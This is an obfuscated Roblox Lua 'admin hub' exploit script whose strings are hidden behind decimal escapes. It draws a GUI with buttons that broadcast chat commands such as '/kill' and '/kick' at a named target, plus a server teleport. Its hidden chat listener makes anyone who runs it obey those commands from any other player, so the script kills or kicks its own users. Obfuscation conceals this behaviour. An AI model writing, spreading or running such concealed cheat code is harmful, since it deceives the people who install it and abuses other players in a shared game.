--[[ 
    JOTINHA12HR2 HUB'S ADMIN - V16 OBFUSCATED
    - Status: Protected
    - Sync System: Active
    - Interface: Divine RGB
]]

repeat task.wait() until game:IsLoaded()

local _0x50 = game:GetService("\80\108\97\121\101\114\115")
local _0x4C = _0x50.LocalPlayer
local _0x52 = game:GetService("\82\117\110\83\101\114\118\105\99\101")
local _0x54 = game:GetService("\84\101\108\101\112\111\114\116\83\101\114\118\105\99\101")
local _0x43 = game:GetService("\67\111\114\101\71\117\105")

local _0x504 = (_0x43 or _0x4C:WaitForChild("\80\108\97\121\101\114\71\117\105"))
if _0x504:FindFirstChild("\68\105\118\105\110\101\86\49\54") then _0x504["\68\105\118\105\110\101\86\49\54"]:Destroy() end

local _0x47 = Instance.new("\83\99\114\101\101\110\71\117\105", _0x504)
_0x47.Name = "\68\105\118\105\110\101\86\49\54"

-- [BOTÃO JH RGB PROTEGIDO]
local _0x4254 = Instance.new("\84\101\120\116\66\111\116\116\111\110", _0x47)
_0x4254.Size = UDim2.new(0, 50, 0, 50)
_0x4254.Position = UDim2.new(0, 10, 0.5, -25)
_0x4254.BackgroundColor3 = Color3.fromRGB(15, 15, 15)
_0x4254.Text = "\74\72"
_0x4254.Font = Enum.Font.LuckiestGuy
_0x4254.TextSize = 22
Instance.new("\85\73\67\111\114\110\101\114", _0x4254).CornerRadius = UDim.new(1, 0)
local _0x5354 = Instance.new("\85\73\83\116\114\111\101\107", _0x4254)
_0x5354.Thickness = 3

_0x52.RenderStepped:Connect(function()
    local _0x434 = Color3.fromHSV(tick() % 5 / 5, 0.8, 1)
    _0x5354.Color = _0x434
    _0x4254.TextColor3 = _0x434
end)

-- [JANELA DIVINA]
local _0x4D46 = Instance.new("\70\114\97\109\101", _0x47)
_0x4D46.Size = UDim2.new(0, 300, 0, 380)
_0x4D46.Position = UDim2.new(0.5, -150, 0.5, -190)
_0x4D46.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
_0x4D46.Active = true
_0x4D46.Draggable = true
Instance.new("\85\73\67\111\114\110\101\114", _0x4D46).CornerRadius = UDim.new(0, 10)
local _0x4D53 = Instance.new("\85\73\83\116\114\111\101\107", _0x4D46)
_0x4D53.Color = Color3.fromRGB(255, 215, 0)
_0x4D53.Thickness = 2

_0x4254.MouseButton1Click:Connect(function() _0x4D46.Visible = not _0x4D46.Visible end)

local _0x5346 = Instance.new("\83\99\114\111\108\108\105\110\103\70\114\97\109\101", _0x4D46)
_0x5346.Size = UDim2.new(1, -10, 1, -50)
_0x5346.Position = UDim2.new(0, 5, 0, 45)
_0x5346.BackgroundTransparency = 1
_0x5346.CanvasSize = UDim2.new(0, 0, 2.8, 0)
_0x5346.ScrollBarThickness = 0
local _0x4C53 = Instance.new("\85\73\76\105\115\116\76\97\121\111\117\116", _0x5346)
_0x4C53.Padding = UDim.new(0, 8)
_0x4C53.HorizontalAlignment = Enum.HorizontalAlignment.Center

local _0x4E49 = Instance.new("\84\101\120\116\66\111\120", _0x5346)
_0x4E49.Size = UDim2.new(0, 260, 0, 35)
_0x4E49.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
_0x4E49.TextColor3 = Color3.new(1,1,1)
_0x4E49.PlaceholderText = "\78\73\67\75\32\68\79\32\65\76\86\79"
Instance.new("\85\73\67\111\114\110\101\114", _0x4E49).CornerRadius = UDim.new(0, 6)

local _0x4A49 = Instance.new("\84\101\120\116\66\111\120", _0x5346)
_0x4A49.Size = UDim2.new(0, 260, 0, 35)
_0x4A49.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
_0x4A49.TextColor3 = Color3.new(1,1,1)
_0x4A49.PlaceholderText = "\74\79\66\32\73\68\32\65\81\85\73"
Instance.new("\85\73\67\111\114\110\101\114", _0x4A49).CornerRadius = UDim.new(0, 6)

local _0x4153 = false

-- [TREM: CHAT SYNC OBF]
local function _0x5052(_0x6D, _0x73)
    local _0x61 = _0x6D:split("\32")
    if #_0x61 >= 2 and _0x61[1]:sub(1,1) == "\47" then
        local _0x63 = _0x61[1]:sub(2):lower()
        local _0x74 = _0x61[2]:lower()
        if (_0x74 == _0x4C.Name:lower() or _0x74 == "\97\108\108") and not _0x4153 then
            if _0x63 == "\107\105\108\108" then _0x4C.Character:BreakJoints()
            elseif _0x63 == "\107\105\99\107" then _0x4C:Kick("\10\84\105\109\101\32\74\111\116\105\110\104\97\49\50\104\114\50\32\72\117\98\39\115\32\65\100\109\105\110")
            elseif _0x63 == "\106\117\109\112" then _0x4C.Character.Humanoid.Jump = true
            elseif _0x63 == "\115\105\116" then _0x4C.Character.Humanoid.Sit = true end
        end
    end
end

for _, _0x5045 in pairs(_0x50:GetPlayers()) do _0x5045.Chatted:Connect(function(_0x6D) _0x5052(_0x6D, _0x5045) end) end
_0x50.PlayerAdded:Connect(function(_0x5045) _0x5045.Chatted:Connect(function(_0x6D) _0x5052(_0x6D, _0x5045) end) end)

local function _0x42(_0x54, _0x434)
    local _0x424 = Instance.new("\84\101\120\116\66\117\116\116\111\110", _0x5346)
    _0x424.Size = UDim2.new(0, 260, 0, 35)
    _0x424.Text = _0x54
    _0x424.BackgroundColor3 = Color3.fromRGB(35, 35, 35)
    _0x424.TextColor3 = Color3.new(1,1,1)
    Instance.new("\85\73\67\111\114\110\101\114", _0x424).CornerRadius = UDim.new(0, 6)
    _0x424.MouseButton1Click:Connect(_0x434)
end

local _0x434D = {"Kill", "Void", "Jail", "Unjail", "Kick", "Bring", "Freeze", "Unfreeze", "Spin", "Unspin", "Blind", "Jump", "Sit"}
for _, _0x76 in pairs(_0x434D) do
    _0x42(_0x76 .. "\32\83\89\78\67", function()
        local _0x6D = "\47" .. _0x76:lower() .. "\32" .. _0x4E49.Text
        game:GetService("\82\101\112\108\105\99\97\116\101\100\83\116\111\114\97\103\101").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(_0x6D, "\65\108\108")
    end)
end

_0x42("\69\78\84\82\65\82\32\78\79\32\74\79\66\32\73\68", function() _0x54:TeleportToPlaceInstance(game.PlaceId, _0x4A49.Text, _0x4C) end)

-- TAG RGB
task.spawn(function()
    local _0x48 = _0x4C.Character:WaitForChild("\72\101\97\100")
    local _0x421 = Instance.new("\66\105\108\108\98\111\97\114\100\71\117\105", _0x48)
    _0x421.Size = UDim2.new(0, 200, 0, 50) _0x421.AlwaysOnTop = true _0x421.ExtentsOffset = Vector3.new(0, 3, 0)
    local _0x542 = Instance.new("\84\101\120\116\76\97\98\101\108", _0x421)
    _0x542.Size = UDim2.new(1, 0, 1, 0) _0x542.BackgroundTransparency = 1 _0x542.Font = Enum.Font.LuckiestGuy _0x542.TextSize = 25
    _0x542.Text = (_0x4C.Name == "\106\111\116\105\110\104\97\49\50\104\114\50" and "\91\68\79\78\79\93\32" or "\91\85\83\69\82\93\32") .. _0x4C.DisplayName
    _0x52.RenderStepped:Connect(function() _0x542.TextColor3 = Color3.fromHSV(tick() % 5 / 5, 0.8, 1) end)
end)

